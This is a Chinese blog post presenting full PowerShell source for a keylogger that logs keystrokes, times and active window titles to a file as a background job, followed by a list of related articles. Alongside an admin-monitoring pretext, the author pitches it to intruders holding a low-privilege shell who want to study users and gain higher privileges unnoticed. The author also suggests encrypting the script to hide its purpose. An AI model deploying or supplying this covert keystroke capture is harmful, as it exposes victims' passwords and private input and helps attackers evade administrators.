作为系统管理员,有些时候是需要记录系统中的其他用户的一些操作行为的,例如:当系统管理员怀疑系统存在漏洞,且已经有被植入后门或者创建隐藏账户时,就需要对曾经登陆的用户进行监控,保存其打开或者操作过的文件。或者在另外一个场景,当黑客拿下一个普通权限的shell之后,想看看最近有哪些用户登陆过,操作过什么,以便根据用户习惯采取进一步行动获取更高权限,这个时候记录用户行为就显得很重要了。

可能有读者觉得此时安装个监控软件不就行了么,拜托,你入侵别人的系统,你装个监控软件,你把管理员试做无物么?这个时候PowerShell这个vista及其之后Windows操作系统都自带的强大的命令行就有了用处,系统自带,不会被管理员发现异常,脚本不用编译,如果脚本内容再加个密,他们更猜不出是干什么用的,嘿嘿。如果要记录几个特性用于记录啥时候干了什么,无非要记录的有几样内容:操作,哪个文件或程序,时间。有这几个特点就基本上可以掌握用户的操作习惯了。

代码不算太难就不逐句解释了,有啥问题的读者可以给我留言询问,基本上关键语句都有注释的。代码如下:

function Get-TimedOperationRecord {

<#

    Author:fuhj(powershell#live.cn ,http://fuhaijun.com)

    Logs keys pressed, time and the active window.

.Parameter LogPath

    Specifies the path where pressed key details will be logged. By default, keystroke are logged to '$($Env:TEMP)\key.log'.

.Parameter CollectionInterval

    Specifies the interval in minutes to capture keystrokes. By default, keystroke are captured indefinitely.

.Example

    Get-TimedOperationRecord -LogPath C:\key.log

.Example

    Get-TimedOperationRecord -CollectionInterval 20

#>

    [CmdletBinding()] Param (

        [Parameter(Position = 0)]

        [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})]

        [String]

        $LogPath = "$($Env:TEMP)\key.log",

        [Parameter(Position = 1)]

        [UInt32]

        $CollectionInterval

    )

    $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)

    Write-Verbose "Logging keystrokes to $LogPath"

    $Initilizer = {

        $LogPath = 'REPLACEME'

        '"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode

        function KeyLog {

            [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

            try

            {

                $ImportDll = [User32]

            }

            catch

            {

                $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')

                $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)

                $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)

                $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

                $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))

                $FieldArray = [Reflection.FieldInfo[]] @(

                    [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),

                    [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),

                    [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),

                    [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),

                    [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),

                    [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')

                )

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))

                $FieldValueArray = [Object[]] @(

                    'GetAsyncKeyState',

                    $True,

                    $False,

                    $True,

                    [Runtime.InteropServices.CallingConvention]::Winapi,

                    [Runtime.InteropServices.CharSet]::Auto

                )

                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)

                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))

                $FieldValueArray = [Object[]] @(

                    'GetKeyboardState',

                    $True,

                    $False,

                    $True,

                    [Runtime.InteropServices.CallingConvention]::Winapi,

                    [Runtime.InteropServices.CharSet]::Auto

                )

                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)

                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))

                $FieldValueArray = [Object[]] @(

                    'MapVirtualKey',

                    $False,

                    $False,

                    $True,

                    [Runtime.InteropServices.CallingConvention]::Winapi,

                    [Runtime.InteropServices.CharSet]::Auto

                )

                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)

                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],

                    [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))

                $FieldValueArray = [Object[]] @(

                    'ToUnicode',

                    $False,

                    $False,

                    $True,

                    [Runtime.InteropServices.CallingConvention]::Winapi,

                    [Runtime.InteropServices.CharSet]::Auto

                )

                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)

                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())

                $FieldValueArray = [Object[]] @(

                    'GetForegroundWindow',

                    $True,

                    $False,

                    $True,

                    [Runtime.InteropServices.CallingConvention]::Winapi,

                    [Runtime.InteropServices.CharSet]::Auto

                )

                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)

                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $ImportDll = $TypeBuilder.CreateType()

            }

            Start-Sleep -Milliseconds 40

                try

                {

                    #loop through typeable characters to see which is pressed

                    for ($TypeableChar = 1; $TypeableChar -le 254; $TypeableChar++)

                    {

                        $VirtualKey = $TypeableChar

                        $KeyResult = $ImportDll::GetAsyncKeyState($VirtualKey)

                        #if the key is pressed

                        if (($KeyResult -band 0x8000) -eq 0x8000)

                        {

                            #check for keys not mapped by virtual keyboard

                            $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000

                            $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000

                            $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000

                            $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000

                            $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000

                            $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000

                            $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000

                            $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000

                            $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000

                            $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000

                            $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000

                            $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000

                            $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000

                            $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000

                            $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000

                            $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000

                            $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                            if ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'}

                            if ($LeftCtrl  -or $RightCtrl)  {$LogOutput += '[Ctrl]'}

                            if ($LeftAlt   -or $RightAlt)   {$LogOutput += '[Alt]'}

                            if ($TabKey)       {$LogOutput += '[Tab]'}

                            if ($SpaceBar)     {$LogOutput += '[SpaceBar]'}

                            if ($DeleteKey)    {$LogOutput += '[Delete]'}

                            if ($EnterKey)     {$LogOutput += '[Enter]'}

                            if ($BackSpaceKey) {$LogOutput += '[Backspace]'}

                            if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}

                            if ($RightArrow)   {$LogOutput += '[Right Arrow]'}

                            if ($UpArrow)      {$LogOutput += '[Up Arrow]'}

                            if ($DownArrow)    {$LogOutput += '[Down Arrow]'}

                            if ($LeftMouse)    {$LogOutput += '[Left Mouse]'}

                            if ($RightMouse)   {$LogOutput += '[Right Mouse]'}

                            #check for capslock

                            if ([Console]::CapsLock) {$LogOutput += '[Caps Lock]'}

                            $MappedKey = $ImportDll::MapVirtualKey($VirtualKey, 3)

                            $KeyboardState = New-Object Byte[] 256

                            $CheckKeyboardState = $ImportDll::GetKeyboardState($KeyboardState)

                            #create a stringbuilder object

                            $StringBuilder = New-Object -TypeName System.Text.StringBuilder;

                            $UnicodeKey = $ImportDll::ToUnicode($VirtualKey, $MappedKey, $KeyboardState, $StringBuilder, $StringBuilder.Capacity, 0)

                            #convert typed characters

                            if ($UnicodeKey -gt 0) {

                                $TypedCharacter = $StringBuilder.ToString()

                                $LogOutput += ('['+ $TypedCharacter +']')

                            }

                            #get the title of the foreground window

                            $TopWindow = $ImportDll::GetForegroundWindow()

                            $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

                            #get the current DTG

                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)

                            #Create a custom object to store results

                            $ObjectProperties = @{'Key Typed' = $LogOutput;

                                                  'Window Title' = $WindowTitle;

                                                  'Time' = $TimeStamp}

                            $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties

                            $CSVEntry = ($ResultsObject | ConvertTo-Csv -NoTypeInformation)[1]

                            #return results

                            Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode

                        }

                    }

                }

                catch {}

            }

        }

    $Initilizer = [ScriptBlock]::Create(($Initilizer -replace 'REPLACEME', $LogPath))

    Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null

    if ($PSBoundParameters['CollectionInterval'])

    {

        $Timer = New-Object Timers.Timer($CollectionInterval * 60 * 1000)

        Register-ObjectEvent -InputObject $Timer -EventName Elapsed -SourceIdentifier ElapsedAction -Action {

            Stop-Job -Name Keylogger

            Unregister-Event -SourceIdentifier ElapsedAction

            $Sender.Stop()

        } | Out-Null

    }

}

执行方式如下图所示:

执行效果,会在指定的目录里生成log文件,内容如下图所示:

能够看到里面相关的击键动作,有兴趣的读者可以猜一下,这段被记录的操作都干了什么,期间腾讯还推了一次弹窗新闻,无耻啊。

作者: 付海军
出处:http://fuhj02.cnblogs.com
版权:本文版权归作者和博客园共有
转载:欢迎转载,为了保存作者的创作热情,请按要求【转载】,谢谢
要求:未经作者同意,必须保留此段声明;必须在文章中给出原文连接且保证内容完整!否则必究法律责任!
个人网站: http://www.fuhaijun.com/

PowerShell定时记录操作系统行为的更多相关文章

  1. PowerShell定时抓取屏幕图像

         昨天的博文写了定时记录操作系统行为,其实说白了就是抓取了击键的记录和对应窗口的标题栏,而很多应用程序标题栏又包含当时记录的文件路径和文件名,用这种方式可以大致记录操作了哪些程序,打开了哪些文 ...

  2. powershell 定时删除脚本

    powershell  定时删除脚本 $today=Get-Date #"今天是:$today" #昨天 #"昨天是:$($today.AddDays(-1))" ...

  3. PowerShell学习记录

    一.简介——连接 Powershell 是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境.你可以把它看成是命令行提示符cmd.exe的扩充,不对,应当是颠覆. powershe ...

  4. CM记录-操作系统调优

    1.避免使用swap分区---将hadoop守护进程的数据交换到磁盘的行为可能会导致操作超时:物理内存(交换)--Swap分区 2.调整内存分配策略---操作系统内核根据vm.overcommit_m ...

  5. Linux常用命令-不定时记录

    文件移动命令 命令格式:mv [-fiv] source destination 参数说明:-f:force,强制直接移动而不询问-i:若目标文件(destination)已经存在,就会询问是否覆盖- ...

  6. 【代码片段】定时记录CPU使用率并保存为CSV

    原文链接 : [https://blog.zhoutao123.com/#/blog/article/64])(https://blog.zhoutao123.com/#/blog/article/6 ...

  7. PowerShell 定时输出citrix desktop昨日连接会话

    asnp citrix*$now_date = [datetime]::Today$day2 = [datetime]::Today - [TimeSpan]::FromHours(24)$fiel_ ...

  8. PowerShell 定时刷新查看文件内容

    get-content .\1.txt -ReadCount 0 -Tail 5 -Wait

  9. CentOS 7 上面安装PowerShell

    看了文章 爱上PowerShell , 就想在CentOS 7上面试试PowerShell , 本文记录了在CentOS 7.2上安装Powershell 的过程. 首先我们要从github上下载最新 ...

随机推荐

  1. RegexKit: A Regular Expression Toolbox Based On NW.js(Node-Webkit) And Other Greate Open Source Projects.

    RegexKit RegexKit: A Regular Expression Toolbox Based On NW.js(Node-Webkit) And Other Greate Open So ...

  2. Java和C#中的接口对比(有你不知道的东西)

    1.与Java不同,C#中的接口不能包含字段(Field). 在java中,接口中可以包含字段,但是这些字段隐式地是static和final的.而C#不允许接口中有字段,编译器在编译时就会提示错误(如 ...

  3. [安卓] 3、EditText使用小程序

    这里比较简单,看下面代码就能知道了:在按钮的点击事件时用String str = et.getText().toString();获取文本内容. public class MainActivity e ...

  4. ActiveMQ第五弹:增加ReDelivery功能

    在使用Message Queue的过程中,总会由于种种原因而导致消息失败.一个经典的场景是一个生成者向Queue中发消息,里面包含了一组邮件地址和邮件内容.而消费者从Queue中将消息一条条读出来,向 ...

  5. java web图片显示到浏览器

    今天研究了一下午,图片显示问题. jsp中获取绝对路径的方法:String contextPath = request.getContextPath();String path = request.g ...

  6. 空间插值文献阅读(Geostatistical approaches for incorporating elevation into the spatial interpolation of rainfall)

    空间插值技术应用必读论文---P. Goovaerts, Geostatistical approaches for incorporating elevation into the spatial ...

  7. paip.提升安全性----Des加密 java php python的实现总结

    paip.提升安全性----Des加密 java php python的实现总结 ///////////    uapi         private static String decryptBy ...

  8. zookeeper 安装与配置

    (1) 下载ZooKeeper,建议选择稳定版,即stable的. [root@bonnie1 ~]# cd /usr/local [root@bonnie1 local]# wget http:// ...

  9. iOS开发——高级技术&iCloud服务

    iCloud服务 iCloud 是苹果提供的云端服务,用户可以将通讯录.备忘录.邮件.照片.音乐.视频等备份到云服务器并在各个苹果设备间直接进行共享而无需关心数据同步问题,甚至 即使你的设备丢失后在一 ...

  10. jQuery/javascript实现全选全不选

    <html> <head> <meta charset="utf-8"> <title>Checkbox的练习</title& ...